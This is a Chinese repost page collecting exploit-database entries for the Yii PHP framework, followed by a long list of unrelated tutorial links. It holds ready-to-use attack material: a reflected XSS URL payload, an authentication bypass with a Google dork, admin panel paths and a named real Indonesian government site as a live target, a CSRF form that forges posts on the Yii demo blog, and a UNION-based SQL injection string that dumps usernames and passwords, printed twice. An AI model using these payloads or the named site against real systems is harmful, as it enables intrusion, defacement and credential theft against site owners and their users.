Yii Framework 漏洞整理
时间:2020-03-26
本文章向大家介绍Yii Framework 漏洞整理,主要包括Yii Framework 漏洞整理使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
一 Yii Framework 2.0.9 - Cross Site ScriptingPublished
# Exploit Title: Yii Framework 2.0.9 - Cross Site Scripting # Discovery Date: 2019-02-12 # Exploit Author: Gionathan "John" Reale # Vendor Homepage: https://www.yiiframework.com/ # Version: 2.0.9 # CVE : 2018-6010 In Yii Framework 2.x before 2.0.14, an reflected XSS vulnerability can be exploited from exception messages printed by the error handler in non-debug mode, related to base/ErrorHandler.php, log/Dispatcher.php, and views/errorHandler/exception.php. Example: http://fakewebsite.com/materiel/index?&MaterielTourModel[publication_date]=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%3Cscript%3Ealert(%221%22)%3C/script%3E
二 Powered by Yii Framework RBAC Manager for Yii 2 Improper Authentication Vulnerability
################################################################################################# # Exploit Title : Powered by Yii Framework RBAC Manager for Yii 2 Improper Authentication Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 01/07/2018 # Vendor Homepage : yiiframework.com # Tested On : Windows # Software Download and Installation Links : packagist.org/packages/mdmsoft/yii2-admin ~ github.com/yii2mod/yii2-rbac ~ github.com/mdmsoft/yii2-admin + yiiframework.com/extension/rbac-manager ~ yiiframework.com/extension/yii2-admin ~ + travis-ci.org/mdmsoft/yii2-admin ~ scrutinizer-ci.com/g/mdmsoft/yii2-admin/?branch=master + codeclimate.com/github/mdmsoft/yii2-admin # Category : WebApps # Versions : 2.x and 3.x # Exploit Risk : Medium # CWE : CWE-287 [ Improper Authentication ] ################################################################################################# # Another Title : Powered by Yii Framework PHP Web Application Development Improper Authentication Vulnerability Yii Framework yii2-admin RBAC Manager for Yii 2 GUI manager for RABC (Role Base Access Control) Yii2. Easy to manage authorization of user Features of the Product [ Software ] Manage RBAC System in intuitive Tree-View Ceep cool with rekursion protection in RBAC Tree Generate PHP Code Full relational move, create, edit, delete support of RBAC Tree items. Assign and eject multiple Roles to and from multiple Users Create predefined buisness Rules for User Assignments Assign Roles in Secure Mode By Controller protected and not changeable Roles and Assignments Use easy checkAccess() methods in your Controller Create easy bizRule Code in your RBAC Roles and Assignments ################################################################################################ # Description for Improper Authentication Vulnerability [ CWE-287 ] + When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct. + If software incorrectly validates user logon information or allows using different techniques of malicious credentials gathering (e.g. brute force, spoofing or change the URL links without giving a username and pass), an attacker can gain certain privileges within the application or disclose sensitive information. + If the parameter is equal to "user" the application allows viewing the information, if it is equal to "admin", then it is possible to edit information on the page: + If an attacker changes the value of the "group" parameter to "admin", he will be able to modify the page. + Powered by Yii Framework RBAC Manager for Yii 2 vulnerability results from software misconfiguration. + The attacker might be able to gain unauthorized access to the application and otherwise restricted areas and perform certain actions, e.g. disclose sensitive information, alter application, or even execute arbitrary code. + An attacker can use a variety of vectors to exploit this weakness, including brute-force, session fixation, and Man-in-the-Middle (MitM) attacks. Reference [ Short Explained by me ] => CWE-287: Improper Authentication [cwe.mitre.org] ################################################################################################# # Google Dork : inurl:''/emusrenbang/web/index.php?r='' # Administration Login Panel => /emusrenbang/web/index.php?r=site%2Flogin # Exploit : No Username. No Password. No Need for Login Credentials. Web don't need login. Just enter this link after URL Link. /emusrenbang/web/index.php?r=admin Whatever you give an exploit like [ anything' OR 'x'='x ] or [ '=''or' ] and many others as SQL Authentication Bypass. It always says that '' Incorrect username or password. '' But we will jump over the admindoor wall. This is called as Improper Authentication Vulnerability. 127.0.0.1/emusrenbang/web/index.php?r=site%2Flogin => [ Proof of Concept ] => archive.is/BLaE5 127.0.0.1/emusrenbang/web/index.php?r=admin => [ Proof of Concept ] => archive.is/D9dKP Useable Admin Control Panel URL Links => /emusrenbang/web/index.php?r=admin /emusrenbang/web/index.php?r=admin%2Fassignment /emusrenbang/web/index.php?r=admin%2Frole /emusrenbang/web/index.php?r=admin%2Fpermission /emusrenbang/web/index.php?r=admin%2Froute /emusrenbang/web/index.php?r=admin%2Frule /emusrenbang/web/index.php?r=admin%2Fmenu /emusrenbang/web/index.php?r=admin%2Fdefault%2Findex ################################################################################################# Indonesia Government Site [ Bappeda Provinsi Sumatera Utara 2016 ] is only vulnerable website. # Example Site => eplanning.sumutprov.go.id/emusrenbang/web/index.php?r=admin%2Fmenu # [ Proof of Concept ] => archive.is/lCRem ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
三 Yii Framework Blog Cross Site Request Forgery
# Exploit Title: Yii Framework Blog Application CSRF Vulnerability # Date: 3 Mar 2014 # Author: Christy Philip Mathew # Demo: Yii Blog Application - http://www.yiiframework.com/demos/blog/ # Category:: web # Tested on: Windows 8 Attacker will be able to create a post. <html> <body> <form action=" http://www.yiiframework.com/demos/blog/index.php/post/create" method="POST"> <input type="hidden" name="Post[title]" value="test" /> <input type="hidden" name="Post[content]" value="test" /> <input type="hidden" name="Post[tags]" value="test" /> <input type="hidden" name="Post[status]" value="2" /> <input type="hidden" name="yt0" value="Create" /> <input type="submit" value="Submit form" /> </form> </body> </html>
四 Yii Framework Search SQL Injection Vulnerability
# Exploit Title: Yii Framework - Search SQL Injection Vulnerability # Google Dork: No Dork # Date: 20/11/2012 # Exploit Author: Juno_okyo # Vendor Homepage: http://www.yiiframework.com/ # Software Link: http://www.yiiframework.com/download/ # Version: 1.1.8 (maybe another version) # #### Vulnerability: ################################## SQL Injection via search form. You can query to get some info about administrator account and something... ################################## Exploitation: ################################## ' UNION SELECT 1,group_concat(username,0x7c,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 fRom user-- - ################################## More Details: ################################## Website: http://junookyo.blogspot.com/ About Exploit: http://junookyo.blogspot.com/2012/11/yii-framework-search-sql-injection.html ################################## Great thanks to Juno_okyo and James - J2TeaM ##################################
# Exploit Title: Yii Framework - Search SQL Injection Vulnerability # Google Dork: No Dork # Date: 20/11/2012 # Exploit Author: Juno_okyo # Vendor Homepage: http://www.yiiframework.com/ # Software Link: http://www.yiiframework.com/download/ # Version: 1.1.8 (maybe another version) # #### Vulnerability: ################################## SQL Injection via search form. You can query to get some info about administrator account and something... ################################## Exploitation: ################################## ' UNION SELECT 1,group_concat(username,0x7c,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 fRom user-- - ################################## More Details: ################################## Website: http://junookyo.blogspot.com/ About Exploit: http://junookyo.blogspot.com/2012/11/yii-framework-search-sql-injection.html ################################## Great thanks to Juno_okyo and James - J2TeaM ##################################
原文地址:https://www.cnblogs.com/junsec/p/12574932.html
- GO语言文件的创建与打开实例分析
- Go语言单链表实现方法
- Go语言实现AzDG可逆加密算法实例
- 剖析Go编写的Socket服务器模块解耦及基础模块的设计
- Golang中的sync.WaitGroup用法实例
- Go 语言实现 MapReduce 框架
- Performance Schema使用简介(一)
- golang 垃圾回收 gc
- Go语言服务器开发之简易TCP客户端与服务端实现方法
- 移动搜索SEO分享:PHP自动生成百度开放适配及360移动适配专用的Sitemap文件
- 分享两种外链跳转方法,可避免权重流失。
- go语言十大排序算法总结
- 网站安全检测提示“页面异常导致本地路径泄漏”的解决办法
- Go语言归并排序算法实现
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- PHP实现微信申请退款功能
- Laravel+Intervention实现上传图片功能示例
- 关于laravel框架中的常用目录路径函数
- Java byte数组操纵方式代码实例解析
- php桥接模式应用案例分析
- PHP设计模式之中介者模式(Mediator Pattern)入门与应用案例详解
- laravel 出现command not found问题的解决方案
- PHP怎么搭建百度Ueditor富文本编辑器
- 使用composer命令加载vendor中的第三方类库 的方法
- PHP批斗大会之缺失的异常详解
- Laravel 6.2 中添加了可调用容器对象的方法
- php实现微信企业转账功能
- 在 Laravel 6 中缓存数据库查询结果的方法
- PHP操作XML中XPath的应用示例
- Laravel手动返回错误码示例